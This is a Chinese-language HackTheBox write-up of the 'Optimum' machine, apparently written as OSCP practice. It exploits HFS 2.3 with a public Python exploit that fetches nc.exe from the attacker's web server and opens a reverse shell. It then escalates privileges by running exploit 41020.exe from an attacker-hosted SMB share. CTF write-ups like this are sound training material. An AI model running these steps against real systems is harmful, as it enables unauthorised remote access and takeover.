hackthebox-optimum(考点：hfs/windows）不用msf

用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者，本篇文章不用msf

nmap

就一个80，提示是HFS 2.3

直接搜searchsploit hfs

用python比较方便，就选择39161.py

打开py看看，有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc，而且还是从本机的http里open/get nc.exe。

于是我把nc.exe放到/var/www/html里，并打开80服务。systemctl start apache2

按要求执行python 39161.py 10.10.10.8 80

本机监听，收到shell

接下来就是找提权漏洞了
可以先systeminfo，再用常用的这个工具

python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls

有挺多的，我试了几个都不行，浪费时间。。。。
最后这个行得通。

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

因为是Windows，所以习惯用smb服务传送&执行，很方便。以前的文章里写过很多操作的方法了。
把41020.exe放到我的共享文件夹里。开启

python smbserver.py Share '/root/exp'

在shell里直接执行

\\10.10.14.57\share\41020.exe

直接搞定。。